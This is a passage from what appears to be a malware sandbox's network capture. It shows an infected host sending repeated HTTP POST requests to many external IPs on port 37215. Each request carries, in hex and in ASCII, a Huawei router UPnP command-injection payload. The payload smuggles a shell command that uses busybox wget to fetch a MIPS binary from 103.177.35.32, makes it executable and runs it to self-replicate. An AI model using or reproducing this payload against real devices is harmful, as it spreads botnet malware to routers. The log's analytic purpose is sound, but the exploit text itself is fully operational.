                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2936192.168.2.234057241.84.215.18137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.664769888 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2937192.168.2.2338504157.43.47.23037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.664808989 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2938192.168.2.2352452160.222.23.2837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.664827108 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2939192.168.2.2337188197.16.18.11037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.664832115 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2940192.168.2.2347248197.246.146.4737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.664841890 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2941192.168.2.2343438197.239.194.24137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.664849997 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2942192.168.2.2336220197.96.126.8337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.664861917 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2943192.168.2.234429841.36.113.9137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.664869070 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2944192.168.2.2336766138.152.128.23337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.664890051 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2945192.168.2.2333580197.102.194.9137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.665013075 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
